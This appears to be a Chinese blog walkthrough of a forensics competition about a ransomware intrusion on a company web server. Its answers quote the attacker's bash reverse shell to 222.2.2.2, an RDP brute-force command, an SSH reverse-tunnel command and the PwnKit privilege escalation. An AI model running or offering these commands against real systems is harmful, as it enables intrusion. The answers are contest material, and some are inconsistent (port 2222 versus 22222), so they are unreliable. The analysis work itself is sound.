背景介绍
某月某日,县公安局接某公司财务部门报警,称其官网及财务报销系统疑被入侵,且攻击者在财务报销系统中投放了勒索病毒,现已无法运行,且服务器内的重要文件均被加密。
县公安局网安大队高度重视,立即根据受害人的反馈对该被入侵服务器进行取证,初步确定了作案手法:这是一次来自互联网的网络攻击,攻击者利用多种漏洞获取到服务器的权限,并投放了勒索病毒对服务器进行加密,以勒索该公司。
案情梳理
官网和财务报销系统被入侵
攻击者在财务报销系统投放了勒索病毒
步骤:
1)来自互联网的网络攻击
2)多种漏洞得到服务器权限
3)投放勒索病毒加密
题目
前提
做题的方法肯定有很多种,每次我都是随性子用方法。也欢迎大家探讨。
检材一
你们是该案件的电子数据取证团队,通过对该公司的两台被入侵服务器进行定向采集磁盘镜像-检材一(WEB.E01),请分析该镜像,并回答以下问题:
1、请计算检材一(WEB.E01)镜像文件的SHA256哈希值为?(50分)(格式:大写)
74D68F936F18797D891A95391CD6D0B8420ADEEA7AD10F7972FD26D1093B4FC3
2、该服务器的操作系统的内核版本为?(100分)(参考格式:5.89.5-xxxx)
3.10.0-514.el7.x86_64
3、该服务器IP地址为?(250分)
192.168.100.100
4、该服务器的放通了哪几个HTTP服务端口?(100分)(参考格式:80,7071,8080,按数值从小到大排列)
80,8888
把一下端口都输入到浏览器测试了一遍,只有80和8888可以访问
5、该服务器的数据库版本号为?(100分)(参考格式:8.9.5-log)
5.6.50
1)一般来说,8888端口是宝塔面板开放的,因此尝试bt default
2)进入配置文件中查看MySQL版本号
6、该网站(商城)所使用的Nginx配置文件名为?(150分)(参考格式:config.json)
www.tpshop.com.conf
这道题结合宝塔面板查看
1)首先明确域名及端口等信息
2)理清楚逻辑
这里的配置文件很清楚的写了,url重写规则引用
原理:
查看途中目录下的nginx.conf文件,看红色横线部分,它的作用就是每个项目拆分为一个独立conf,然后在主配置文件中 include 集成进来
在nginx中做内部转发,监听在80端口,根据请求路由(URI路径)做区分转发
3)找到对应的conf文件
一般都是域名.conf
参考:
https://blog.csdn.net/u011897392/article/details/127441868
7、该服务器的服务器管理面板地址为?(150分)(参考格式 :http://127.0.0.1/test)
http://192.168.100.100:8888/0d85fe0b
吐槽:其实我觉得这里题目问得有问题,问服务器面板是个啥,问宝塔面板差不多
8、该服务器中搭建了几个网站?(格式 :数字)(150分)
2
9、该服务器中存在的几个网站,请分别写出网站域名?(200分)(格式:www.baidu.com,www.google.com,按b小于g的顺序填写)
www.tpshop.com,www.mine.com
第二个需要点进去看
10、请分析是哪个网站遭到入侵,该网站的后台登陆URL地址为?(200分)(格式为域名+路径,比如:www.baidu.com/test)
http://192.168.100.100/index.php/Admin/Admin/login.html
1)明确日志存放目录
2)翻日志,稍做分析
11、攻击者的IP地址是多少?(250分)(格式:255.255.255.1)
222.2.2.2
像这种操作,这种传参,一看就是黑客在尝试利用漏洞做信息泄露(是信息泄露吧,太久没挖漏洞不记得了)
12、攻击者成功写入了一句话木马的时间为?(250分)(格式:2021-01-01 01:01:01)
2022-03-04 15:15:13
13、据公司管理员描述,该网站运行期间一直开启着流量抓包程序,请尝试寻找网络数据包,计算网络数据包的SHA256哈希值?(100分)(格式:大写)
9750f305800ca07927c5aa89519885e63ae5d3331ef33ff53460cb2c82bde8b1
不用找
但是他有两个流量包,我就不能理解了。
然后看到题目说:该网站运行期间一直开启着流量抓包程序
所以,想到找历史命令。
14、通过对数据包进行分析,发现违法攻击者使用什么工具对内网进行了扫描,该工具的SHA256哈希值为?(100分)(格式:大写)
AE50F0CD8808CA3FBBD8C4456771E0FFF41D3FCF154D20FBCC9456FA0ABC313A
这道题就有的一说了,前几天一直在玩流量分析,结合安恒2018年那套题,用关键字搜索一下就好了。
步骤:
1)试过awvs、nessus等,总结:用工具扫描的话,一般会包含scan字段
追踪TCP流,看到是下边这个东西:
(无论哪种软件,我看好的永远是搜索功能)
goon的使用方法:
2)去centos本地找一找这个东西在哪
3)去到这个路径下边,会发现后边有道题的CVE漏洞利用工具也在这里
4)到此答案就可以了(不要傻乎乎的拖出来算)
参考:
https://blog.csdn.net/qq_43717836/article/details/131129067
http://blog.itpub.net/69955379/viewspace-2730208/
重要提醒:为防止作弊,15题-20题在提交答案前,参赛人员需主动举手向工作人员展示解题过程后方可提交,否则不得分。工作人员只负责核实解题过程是否真实,不负责答案是否准确。
15、攻击者使用哪个字典对内网服务器进行爆破,请提供该字典文件的SHA256哈希值?(100分)(格式:大写)
5BA1433EC09D6F06E3092CF0FCD0BBF9CA8CA4F96C825BD1DBD6B412725821FA
还是翻找到的那个TCP流,里面写的很清楚:
要对这些命令熟悉,才比较好判断
和goon_lin同一个目录
16、请分析,黑客所使用的bash反弹shell命令为?(250分)(格式:bash xxxxxxxxxx>&1)
bash -i>& /dev/tcp/222.2.2.2/10000 0>&1
对数据包做筛选的同事,过滤IP等条件
ip.src==222.2.2.2&&ip.dst==192.168.100.100&&http.request.method=="POST"
但要注意的是,Y2QgIi前面总是会多两个不知道是什么意思的字符,一定要去掉。至于多两个字符的原因,我暂时也不知道。(后续知道了再填坑)
17、攻击者是利用哪条命令对内网进行爆破,并且成功的?(250分)
./goon2_lin -ip 192.168.100.254 -mode rdp -user administrator -pfile FastPwds.txt
18、攻击者是利用哪个提权漏洞获取root权限的?(200分)(格式:漏洞编号,比如CVE-2009-1233)
CVE-2021-4034
做14题的时候,不是找到了路径嘛
再结合流量包的操作命令看,会发现PwnKit是个2021年的CVE。
19、在爆破成功后,攻击者是通过一种方式与内网服务器建立隧道,该隧道建立的命令为?(250分)
ssh -CgfNR 0.0.0.0:22222:192.168.100.254:3389 root@222.2.2.2 -p33333
1)搜索web服务器里面的历史命令先看一看
下边这个情况,很明显就是答案了
参考:
https://blog.csdn.net/qq_27803491/article/details/122851174
20、接上题,该命令建立隧道后,攻击者可以在回连服务器的哪个端口访问到内网服务?(格式:8899)(150分)
2222
由上题可知。
到目前为止,有一个流量包2还没用上,看看后续是不是有关联。
扫一扫
5110
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
